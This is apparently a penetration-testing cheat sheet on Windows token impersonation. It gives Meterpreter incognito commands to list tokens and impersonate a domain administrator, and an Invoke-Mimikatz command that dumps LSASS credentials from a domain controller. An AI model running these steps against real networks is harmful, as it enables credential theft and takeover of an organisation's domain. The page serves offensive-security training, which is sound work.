Skip to main content

Token Impersonation


Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain until the system is rebooted.

Types of Tokens

  • Delegate: Created for logging into a machine or RDP
  • Impersonate: Used for non-interactive authentication such as network drive mapping

Finding Tokens

Ideally, you want to find tokens of a domain administrator in order expose additional attack vectors against the domain controller.

To move laterally across different computers on the domain, you could do this via passing hashes or passwords or users that have privileges across multiple systems; or by compromising additional vulnerable services.

Dumping Tokens with Metasploit

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator

Now, that we are running in the context of a domain administrator, we could use a tool like Invoke-Mimikatz to dump the LSASS on the domain controller.

PS C:\ > hostname
PS C:\ > Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer

Revert Msfconsole Shell

This will revert the meterpreter session to its original state

meterpreter > revself